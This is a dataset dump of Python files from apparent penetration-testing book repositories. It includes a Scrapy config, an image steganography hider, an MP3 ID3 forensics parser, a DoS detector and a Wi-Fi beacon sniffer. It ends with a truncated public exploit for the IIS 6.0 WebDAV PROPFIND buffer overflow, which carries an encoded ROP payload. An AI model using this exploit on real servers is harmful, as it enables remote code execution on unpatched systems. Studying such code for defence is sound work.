repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
Python-Penetration-Testing-Cookbook | # -*- coding: utf-8 -*-
# Scrapy settings for books project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'books'
SPIDER_MODULES = ['books.spiders']
NEWSPIDER_MODULE = 'books.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'books (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'books.middlewares.BooksSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'books.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'books.pipelines.BooksPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 33.274725 | 109 | 0.764272 |
cybersecurity-penetration-testing | #!/usr/bin/env python
from optparse import OptionParser
from PIL import Image
def HideMessage(carrier, message, outfile):
cImage = Image.open(carrier)
hide = Image.open(message)
hide = hide.resize(cImage.size)
hide = hide.convert('1')
out = Image.new(cImage.mode, cImage.size)
width, height = cImage.size
newArray = []
for h in range(height):
for w in range(width):
ip = cImage.getpixel((w,h))
hp = hide.getpixel((w,h))
if hp == 0: # Force 0 And with 254
newred = ip[0] & 254
else: # Force 1 Or with 1
newred = ip[0] | 1
newArray.append((newred, ip[1], ip[2]))
out.putdata(newArray)
out.save(outfile)
print "Steg image saved to " + outfile
def ExtractMessage(carrier, outfile):
cImage = Image.open(carrier)
out = Image.new('L', cImage.size)
width, height = cImage.size
newArray = []
for h in range(height):
for w in range(width):
ip = cImage.getpixel((w,h))
if ip[0] & 1 == 0:
newArray.append(0)
else:
newArray.append(255)
out.putdata(newArray)
out.save(outfile)
print "Message extracted and saved to " + outfile
if __name__ == "__main__":
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser(usage=usage)
parser.add_option("-c", "--carrier", dest="carrier",
help="The filename of the image used as the carrier.",
metavar="FILE")
parser.add_option("-m", "--message", dest="message",
help="The filename of the image that will be hidden.",
metavar="FILE")
parser.add_option("-o", "--output", dest="output",
help="The filename the hidden image will be extracted to.",
metavar="FILE")
parser.add_option("-e", "--extract",
action="store_true", dest="extract", default=False,
help="Extract hidden image from carrier and save to output filename.")
(options, args) = parser.parse_args()
if options.extract == True:
if options.carrier is None or options.output is None:
parser.error("a carrier filename -c and output file -o are required for extraction")
else:
ExtractMessage(options.carrier, options.output)
else:
if options.carrier is None or options.message is None or options.output is None:
parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
else:
HideMessage(options.carrier, options.message, options.output)
| 32.506173 | 115 | 0.579064 |
cybersecurity-penetration-testing | '''
MP3-ID3Forensics
Python Script (written completely in Python)
For the extraction of meta data and
potential evidence hidden in MP3 files
specifically in the ID3 Headers
Author C. Hosmer
Python Forensics
Copyright (c) 2015-2016 Chet Hosmer / Python Forensics, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
'''
# IMPORT MODULES
# Standard Python Libraries
import os # Standard Operating System Methods
import argparse # Command Line Argument Parsing
from struct import * # Handle Strings as Binary Data
import string # Special string Module
import time # Date Time Module
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calcuate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
#
# Print Hexidecimal / ASCII Page Heading
#
def PrintHeading():
print("Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F ASCII")
print("------------------------------------------------------------------------------------------------")
return
# End PrintHeading
#
# Print ID3 Frame Contents
#
# Input: buff - Holding the frame content
# buffSize - Size of the frame contents
#
def PrintContents(buff, buffSize):
PrintHeading()
offset = 0
# Loop through 1 line at a time
for i in range(offset, offset+buffSize, 16):
# Print the current offset
print "%08x " % i,
# Print 16 Hex Bytes
for j in range(0,16):
if i+j >= buffSize:
print ' ',
else:
byteValue = ord(buff[i+j])
print "%02x " % byteValue,
print " ",
# Print 16 Ascii equivelents
for j in range (0,16):
if i+j >= buffSize:
break
byteValue = ord(buff[i+j])
# If printable characters print them
if (byteValue >= 0x20 and byteValue <= 0x7f):
print "%c" % byteValue,
else:
print '.',
print
return
# End Print Buffer
'''
ID3 Class
Extracting Meta and Evidence from mp3 files
'''
class ID3():
#Class Constructor
def __init__(self, theFile):
# Initialize Attributes of the Object
# Local Constants
self.KNOWN_TAGS_V3 = {
'AENC': 'Audio encryption: ',
'APIC': 'Attached picture: ',
'COMM': 'Comments: ',
'COMR': 'Commercial frame: ',
'ENCR': 'Encryption method registration: ',
'EQUA': 'Equalization: ',
'ETCO': 'Event timing codes: ',
'GEOB': 'General encapsulated object: ',
'GRID': 'Grp identification registration: ',
'IPLS': 'Involved people list: ',
'LINK': 'Linked information: ',
'MCDI': 'Music CD identifier: ',
'MLLT': 'MPEG location lookup table: ',
'OWNE': 'Ownership frame: ',
'PRIV': 'Private frame: ',
'PCNT': 'Play counter: ',
'POPM': 'Popularimeter: ',
'POSS': 'Position synchronisation frame: ',
'RBUF': 'Recommended buffer size: ',
'RGAD': 'Replay Gain Adjustment: ',
'RVAD': 'Relative volume adjustment: ',
'RVRB': 'Reverb: ',
'SYLT': 'Synchronized lyric/text: ',
'SYTC': 'Synchronized tempo codes: ',
'TALB': 'Album/Movie/Show title: ',
'TBPM': 'BPM beats per minute: ',
'TCOM': 'Composer: ',
'TCON': 'Content type: ',
'TCOP': 'Copyright message: ',
'TDAT': 'Date: ',
'TDLY': 'Playlist delay: ',
'TDRC': 'Recording Time: ',
'TENC': 'Encoded by: ',
'TEXT': 'Lyricist/Text writer: ',
'TFLT': 'File type: ',
'TIME': 'Time: ',
'TIT1': 'Content group description: ',
'TIT2': 'Title/songname/content descrip: ',
'TIT3': 'Subtitle/Description refinement: ',
'TKEY': 'Initial key: ',
'TLAN': 'Language: ',
'TLEN': 'Length: ',
'TMED': 'Media type: ',
'TOAL': 'Original album/movie/show title: ',
'TOFN': 'Original filename: ',
'TOLY': 'Original lyricist/text writer: ',
'TOPE': 'Original artist/performer: ',
'TORY': 'Original release year: ',
'TOWN': 'File owner/licensee: ',
'TPE1': 'Lead performer/Soloist: ',
'TPE2': 'Band/orchestra/accompaniment: ',
'TPE3': 'Conductor/performer refinement: ',
'TPE4': 'Interpreted, remixed, modified by:',
'TPOS': 'Part of a set: ',
'TPUB': 'Publisher: ',
'TRCK': 'Track number/Position in set: ',
'TRDA': 'Recording dates: ',
'TRSN': 'Internet radio station name: ',
'TRSO': 'Internet radio station owner: ',
'TSIZ': 'Size: ',
'TSRC': 'Intl standard recording code: ',
'TSSE': 'SW/HW settings used for encoding: ',
'TYER': 'User defined text frame: ',
'TXXX': 'User define general text frame: ',
'UFID': 'Unique file identifier: ',
'USER': 'Terms of use: ',
'USLT': 'Unsyched lyric/text transcription:',
'WCOM': 'Commercial information: ',
'WCOP': 'Copyright/Legal informationL ',
'WOAF': 'Official audio file webpage: ',
'WOAR': 'Official artist/performer webpage:',
'WOAS': 'Official audio source webpage: ',
'WORS': 'Official internet radio homepage: ',
'WPAY': 'Payment: ',
'WPUB': 'Publishers official webpage: ',
'WXXX': 'User defined URL link frame: '
}
self.KNOWN_TAGS_V2 = {
'BUF': 'Recommended buffer size',
'COM': 'Comments',
'CNT': 'Play counter',
'CRA': 'Audio Encryption',
'CRM': 'Encrypted meta frame',
'ETC': 'Event timing codes',
'EQU': 'Equalization',
'GEO': 'General encapsulated object',
'IPL': 'Involved people list',
'LNK': 'Linked information',
'MCI': 'Music CD Identifier',
'MLL': 'MPEG location lookup table',
'PIC': 'Attached picture',
'POP': 'Popularimeter',
'REV': 'Reverb',
'RVA': 'Relative volume adjustment',
'SLT': 'Synchronized lyric/text',
'STC': 'Synced tempo codes',
'TAL': 'Album/Movie/Show title',
'TBP': 'BPM Beats Per Minute',
'TCM': 'Composer',
'TCO': 'Content type',
'TCR': 'Copyright message',
'TDA': 'Date',
'TDY': 'Playlist delay',
'TEN': 'Encoded by',
'TFT': 'File type',
'TIM': 'Time',
'TKE': 'Initial key',
'TLA': 'Languages',
'TLE': 'Length',
'TMT': 'Media type',
'TOA': 'Original artists/performers',
'TOF': 'Original filename',
'TOL': 'Original Lyricists/text writers',
'TOR': 'Original release year',
'TOT': 'Original album/Movie/Show title',
'TP1': 'Lead artist(s)/Lead performer(s)/Soloist(s)/Performing group',
'TP2': 'Band/Orchestra/Accompaniment',
'TP3': 'Conductor/Performer refinement',
'TP4': 'Interpreted, remixed, or otherwise modified by',
'TPA': 'Part of a set',
'TPB': 'Publisher',
'TRC': 'International Standard Recording Code',
'TRD': 'Recording dates',
'TRK': 'Track number/Position in set',
'TSI': 'Size',
'TSS': 'Software/hardware and settings used for encoding',
'TT1': 'Content group description',
'TT2': 'Title/Songname/Content description',
'TT3': 'Subtitle/Description refinement',
'TXT': 'Lyricist/text writer',
'TXX': 'Year',
'UFI': 'Unique file identifier',
'ULT': 'Unsychronized lyric/text transcription',
'WAF': 'Official audio file webpage',
'WAR': 'Official artist/performer webpage',
'WAS': 'Official audio source webpage',
'WCM': 'Commercial information',
'WCP': 'Copyright/Legal information',
'WPB': 'Publishers official webpage',
'WXX': 'User defined URL link frame'
}
self.picTypeList = [
'Other',
'fileIcon',
'OtherIcon',
'FrontCover',
'BackCover',
'LeafletPage',
'Media',
'LeadArtist',
'ArtistPerformer',
'Conductor',
'BandOrchestra',
'Composer',
'Lyricist',
'RecordingLocation',
'DuringRecording',
'DuringPerformance',
'MovieScreenCapture',
'Fish',
'Illustration',
'BandArtistLogo',
'PublisherStudioLogo'
]
# Attributes of the Class
self.fileName = ''
self.id3Size = 0
self.fileContents = ''
self.mp3 = False
self.id3 = False
self.hdr = ''
self.flag = 0
self.version = 0
self.revision = 0
self.unsync = False
self.extendedHeader = False
self.experimental = False
self.hasPicture = False
self.imageCount = 0
self.frameList = []
self.padArea = ''
# Now Process the Proposed MP3 File
try:
self.fileName = theFile
with open(theFile, 'rb') as mp3File:
self.fileContents = mp3File.read()
except:
print "Could not process input file: ", theFile
quit()
#Strip off the first 10 characters of the file
stripHeader = self.fileContents[0:6]
#now unpack the header
id3Header = unpack('3sBBB', stripHeader)
self.hdr = id3Header[0]
self.version = id3Header[1]
self.revision = id3Header[2]
self.flag = id3Header[3]
if self.hdr == 'ID3' and self.version in range(2,4):
self.id3 = True
else:
self.id3 = False
print "MP3 File type not supported"
quit()
# If we seem to have a valid MP3 ID3 Header
# Attempt to Process the Header
# Get Size Bytes and unpack them
stripSize = self.fileContents[6:10]
id3Size = unpack('BBBB', stripSize)
# Calculate the Size (this is a bit tricky)
# and add in the 10 byte header not included
# in the size
self.id3Size = self.calcID3Size(id3Size) + 10
# check the unsync flag
if self.flag & 0x60:
self.unsync = True
# check the extended header flag
if self.flag & 0x40:
self.extendedHeader = True
# check the experimental indicator
if self.flag & 0x40:
self.experimental = True
self.processID3Frames()
return
'''
Print out any extracted header information
'''
def printResults(self):
print "==== MP3/ID3 Header Information"
print "ID3 Found: ", self.id3
if self.id3:
print "File: ", self.fileName
print "ID3 Hdr Size: ", self.hdr
print "Version: ", self.version
print "Revision: ", self.revision
print "Size: ", self.id3Size
print "Unsync ", self.unsync
print "Extended Header: ", self.extendedHeader
print "Experimental: ", self.experimental
print "Images Found: ", str(self.imageCount)
print "\n------------------------------------------------------------------------"
print "ID3 Frames"
print "------------------------------------------------------------------------"
for entry in self.frameList:
print "FrameID: ", entry[0]
print "Frame Type: ", entry[1]
print "Frame Size: ", entry[2]
print "Tag Preservation: ", entry[4]
print "File Preservation: ", entry[5]
print "Read Only: ", entry[6]
print "Compressed: ", entry[7]
print "Encrypted: ", entry[8]
print "Group Identity: ", entry[9]
print "\nFrame Content:\n"
PrintContents(entry[3], len(entry[3]))
print "====================================================================================================\n"
print "\nPad Area - Size", len(self.padArea)
if len(self.padArea) != 0:
PrintContents(self.padArea, len(self.padArea))
print "\n\n END PyMP3 Forensics"
def processID3Frames(self):
if self.id3:
# starting first frame location
frameOffset = 10
imageCount = 0
# Loop Through all the frames until we reach
# Null ID
# while self.fileContents[frameOffset] != '\000':
while frameOffset < self.id3Size:
# check for padding
if self.fileContents[frameOffset] == '\000':
# we are at the end of the frame
# and we have found padding
# record the pad area
self.padArea = self.fileContents[frameOffset:self.id3Size]
break
if self.version == 2:
# Version 2 Headers contain
# 6 bytes
# sss = type
# xxx = size
frameID = self.fileContents[frameOffset:frameOffset+3]
if frameID in self.KNOWN_TAGS_V2:
frameDescription = self.KNOWN_TAGS_V2[frameID]
else:
frameDescription = 'Unknown'
frameOffset +=3
stripSize = self.fileContents[frameOffset:frameOffset+3]
frameOffset +=3
frameSize = unpack('BBB', stripSize)
integerFrameSize = self.calcFrameSize(frameSize)
# If the frame is a picture
# extract the contents of the picture and create
# a separate file
if frameID == "PIC":
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 2, integerFrameSize, self.imageCount)
# For version 2 set all version 3 flags to False
tagPreservation = False
filePreservation = False
readOnly = False
compressed = False
encrypted = False
groupID = 0
elif self.version == 3:
# Version 3 Headers contain
# 10 Bytes
# ssss = Type
# xxxx = size
# xx = flags
v3Header = self.fileContents[frameOffset:frameOffset+10]
frameOffset += 10
try:
frameHeader = unpack('!4sIBB', v3Header)
except:
print "Unpack Failed"
quit()
frameID = frameHeader[0]
integerFrameSize = frameHeader[1]
flag1 = frameHeader[2]
flag2 = frameHeader[3]
if frameID == 'APIC':
self.hasPicture = True
# bump the image count in case multiple images
# are included in this file
self.imageCount+=1
self.extractPicture(frameOffset, 3, integerFrameSize, self.imageCount)
if frameID in self.KNOWN_TAGS_V3:
frameDescription = self.KNOWN_TAGS_V3[frameID]
else:
frameDescription = 'Unknown'
if flag1 & 0x80:
tagPreservation = False
else:
tagPreservation = True
if flag1 & 0x60:
filePreservation = False
else:
filePreservation = True
if flag1 & 0x40:
readOnly = True
else:
readOnly = False
if flag2 & 0x80:
compressed = True
else:
compressed = False
if flag2 & 0x60:
encrypted = True
else:
encrypted = False
if flag2 & 0x40:
groupId = True
else:
groupID = False
else:
print "Version Not Supported"
quit()
frameContent = self.fileContents[frameOffset:frameOffset+integerFrameSize]
frameOffset += integerFrameSize
# Add frame information
self.frameList.append([frameID, frameDescription, integerFrameSize, frameContent, tagPreservation, filePreservation, readOnly, compressed, encrypted, groupID] )
print frameID, frameDescription,
if frameContent[0] == "\000":
frameDump = frameContent[1:]
else:
frameDump = frameContent
frameSnip = ''
if frameID == "COMM":
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
continue
else:
for eachChar in frameDump:
if eachChar in string.printable:
frameSnip = frameSnip + eachChar
else:
break
print frameSnip[0:80]
print
return
'''
extractPicture from ID3 Frame
input: offset to the frame
version (2 or 3)
writes output to an images directory
note the images directory must exist
./images/
'''
def extractPicture(self, off, ver, lenOfFrame, imgCnt):
if ver == 2:
# Now extract the picture type
picType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
picType = picType+self.fileContents[typeOffset]
typeOffset+=1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+".image"+str(imgCnt)+"."+picType
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
elif ver == 3:
# Now extract the picture type
mimeType = ''
typeOffset = off+1
while self.fileContents[typeOffset] != '\000':
mimeType = mimeType+self.fileContents[typeOffset]
typeOffset+=1
# Set the file extension based on the mime type
if mimeType.find('jpeg'):
ext = "jpg"
elif mimeType.find('png'):
ext = "png"
else:
ext = "dat"
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Next Byte is the Picture Type
picType = self.fileContents[typeOffset]
intPicType = ord(picType)
if intPicType >= 0 and intPicType <= len(self.picTypeList):
picTypeStr = self.picTypeList[intPicType]
else:
picTypeStr = "Unknown"
typeOffset += 1
# skip terminating characters
while self.fileContents[typeOffset] == '\000':
typeOffset+=1
# Extract the picture from the content
thePicture = self.fileContents[typeOffset:off+lenOfFrame]
# Create a unique name for the picture relating it back to the original
# filename into a sub-directory named images
imageName = "./images/"+os.path.basename(self.fileName)+'.'+picTypeStr+'.'+str(imgCnt)+"."+ext
# Open the file for writing and write out the content
with open(imageName, "wb") as out:
out.write(thePicture)
'''
Calculate the ID3 Size
The ID3 Size is 28 bits spread over 4 bytes in Big Endian Format
the MSB of each byte is ignored and the remaining 7 bits of each byte are
concatenated together to produce a 28 bit string.
For example the four byte size shown below:
0x0 0x1 0x4a 0x3
Creates the following 28 bit string
0000000000000110010100000011
for a decimal integer value of:
25859
Adding in the 10 header bytes (which is not included in the size)
the total size is:
25869
Excerpt from ID3 Standard
The ID3 tag size is the size of the complete tag after
unsychronisation, including padding, excluding the header (total tag
size - 10). The reason to use 28 bits (representing up to 256MB) for
size description is that we don't want to run out of space here.
calcID3Size(receives a tuple of the four bytes)
'''
def calcID3Size(self, bytes):
# Convert the tuple to a list for easy processing
bytes = list(bytes)
# Ensure that the MSB of each Byte is zero
bytes[0] = bytes[0] & 0x7f
bytes[1] = bytes[1] & 0x7f
bytes[2] = bytes[2] & 0x7f
bytes[3] = bytes[3] & 0x7f
# Initialize the bit string we will create
bits = ""
# loop through each byte setting each
# to a '1' or '0' starting with bit 6
for val in bytes:
i = 64
# continue until we process all bits
# from bit 6-0
while i > 0:
if val & i:
bits = bits + '1'
else:
bits = bits + '0'
# move to the next lower bit
i = i/2
# Now simply Convert the Binary String to an Integer
integerSize = int(bits,2)
return integerSize
'''
Calculate the Frame size from the 3 hex bytes provided
Excerpt from ID3v2 Standard
The three character frame identifier is followed by a three byte size
descriptor, making a total header size of six bytes in every frame.
The size is calculated as framesize excluding frame identifier and
size descriptor (frame size - 6).
calcFrameSize(receives a tuple of the three bytes)
'''
def calcFrameSize(self, bytes):
valList = list(bytes)
finalValue = valList[0] << 16
finalValue = finalValue | valList[1] << 8
finalValue = finalValue | valList[2]
return finalValue
'''
Main Program
'''
def main():
print
print "Python Forensics, Inc. www.python-forensics.org"
print "Python MP3 Forensics v 1.0 June 2016"
print "developed by: C. Hosmer"
print
print "Script Started", GetTime()
print
# Process the command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('mp3File')
theArgs = parser.parse_args()
# Obtain the single argument which is the
# full path name of the file to process
mp3File = theArgs.mp3File
# set the output to verbose
verbose = True
print "Processing MP3 File: ", mp3File
print
# Process the mp3File
objID3 = ID3(mp3File)
# If verbose is selected the print results to standard out
# otherwise create a log file
if objID3.id3:
if verbose:
objID3.printResults()
else:
# Turn on Logging
logging.basicConfig(filename='pSearchLog.log',level=logging.DEBUG,format='%(asctime)s %(message)s')
objID3.logResults()
if __name__ == "__main__":
main() | 34.978287 | 176 | 0.450796 |
Python-Penetration-Testing-for-Developers | import socket
import struct
from datetime import datetime
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
dict = {}
file_txt = open("dos.txt",'a')
file_txt.writelines("**********")
t1= str(datetime.now())
file_txt.writelines(t1)
file_txt.writelines("**********")
file_txt.writelines("\n")
print "Detection Start ......."
D_val =10
D_val1 = D_val+10
while True:
pkt = s.recvfrom(2048)
ipheader = pkt[0][14:34]
ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
IP = socket.inet_ntoa(ip_hdr[3])
print "Source IP", IP
if dict.has_key(IP):
dict[IP]=dict[IP]+1
print dict[IP]
if(dict[IP]>D_val) and (dict[IP]<D_val1) :
line = "DDOS Detected "
file_txt.writelines(line)
file_txt.writelines(IP)
file_txt.writelines("\n")
else:
dict[IP]=1
| 18.65 | 55 | 0.633121 |
Python-Penetration-Testing-for-Developers | import socket
import sys, os, signal
sniff = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 3)
sniff.bind(("mon0", 0x0003))
ap_list =[]
while True :
fm1 = sniff.recvfrom(6000)
fm= fm1[0]
if fm[26] == "\x80" :
if fm[36:42] not in ap_list:
ap_list.append(fm[36:42])
a = ord(fm[63])
print "SSID -> ",fm[64:64 +a],"-- BSSID -> ", \
fm[36:42].encode('hex'),"-- Channel -> ", ord(fm[64 +a+12])
| 23.058824 | 60 | 0.590686 |
PenTesting | '''
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Additional Information: the ScStoragePathFromUrl function is called twice
Vulnerability Type: Buffer overflow
Vendor of Product: Microsoft
Affected Product Code Base: Windows Server 2003 R2
Affected Component: ScStoragePathFromUrl
Attack Type: Remote
Impact Code execution: true
Attack Vectors: crafted PROPFIND data
Has vendor confirmed or acknowledged the vulnerability?:true
Discoverer:Zhiniang Peng and Chen Wu.
Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
'''
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If: <http://localhost/aaaaaaa'
pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\x